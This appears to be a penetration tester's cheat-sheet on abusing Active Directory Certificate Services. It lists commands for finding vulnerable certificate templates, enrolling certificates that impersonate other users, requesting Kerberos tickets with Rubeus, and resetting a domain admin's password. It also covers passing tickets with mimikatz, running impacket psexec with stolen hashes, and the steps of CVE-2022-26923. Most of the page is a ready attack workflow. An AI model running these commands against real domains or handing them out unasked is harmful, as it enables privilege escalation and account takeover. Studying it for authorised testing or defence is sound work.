4.5 KiB
Active Directory Certificate Service ADCS
-
Internal CA
-
PKI
-
File system encryption
-
Digital signatures
-
User authentication
-
Certificates will not be revoked after account password reset
Certificate Templates
- Extended/Enhanced Key Usage (EKU)
- Parameter combination can be exploited
- User Certificates may be requested from a member of a Domain User Group
- Machine Certifcates may be requested from a host of a Domain Computer Group
Enumeration
certutil -v -template > ct.txt
Exploitable templates should have the following traits:
Allow EnrollorAllow Full Controlpermissions to request certificate- Find groups by
net user <username> /domain-->Domain Users,Domain Computers
- Find groups by
- Client authentication EKU for Kerberos authentication -->
Client Authentication - Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, -->
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
Certify
Find information about all registered CAs. For a start take a look at least at
Certify.exe find /vulnerable
Certificate Creation
Win+R-->mmc-->File-->Add/Remove Snap-in-->Certificates(Request Certificate if administration account --> Computer Account)- After that in the main menu,
Certificates--> right click onPersonal-->All Tasks-->Request Certificates-->Next-->Next-->More information is required to enroll this certificate-->Common Name-->CN=concerto&&User Principal Nameis the user to impersonate -->OK--> selectUser Request-->Enroll - After that in the main menu,
Personal-->Certificates--> The certificate - Right click certificate -->
All Tasks-->Export-->Yes, export private key-->PFX--> setPassword--> Save
An alternative is certipy-ad
Certipy-AD
First pip install certipy-ad
Take a look at the Documentation provided in the git repositories'
README.
Since it is possible to create certifcates of (Sub)CAs if you do have the right permissions on CA directly, it is worth a check.
Hacktricks' AD CS Domain Escalation provides the details.
Impersonation
Request TGT with the created cert.
On the target machine via
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller>
Select a domain admin via opening Active Directory Users and Computers
.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>
-
runas /user:<domain>\<username of DA> cmd.exe -
Alternatively, load the outfile of rubeus via mimikatz to authenticate as the impersonated user on a remote domain
privilege::debug
kerberos::ptt <name of file to write TGT to.kirbi>
exit
dir \\<domain>\<dir>$\
On the attacking machine
Use impacket's psexec
psexec.py $DOMAIN/administrator@$DOMAIN -hashes $found_hash -dc-ip $DC_IP
CVE-2022-26923
- Aims on abusing templates configuration, the Subject Alternative Name
SAN. Set it to someone with higher permissions - User and Machine certificate templates
- User Principal Name is used for
SAN, this template can not be modified in a way to escalate privileges - Computer accounts DNS name is used for
SAN - Users of the Authenticated Users Group can create 10 Machine Certificates
- DNS hostname is used for authentication
- Service Principal Names (SPN), associates a service logon with a service instance. SPNs are unique
- Permissions of interest, all two are needed
- Validate write to DNS hostname allows to update DNS hostname of AD object associated with the host
- Validate write to SPN, update SPN of the AD object associated with the host
Usage
- User account has to be compromised, use it to enrol a new host on the domain
- Alter the DNS hostname attribute of the AD Object to one of a Domain Controller or other higher privilege
- Remove the SPN attribute to bypass the unique SPN
- With the default template request the machine cert
- authenticate via Kerberos with the template as the higher privileged machine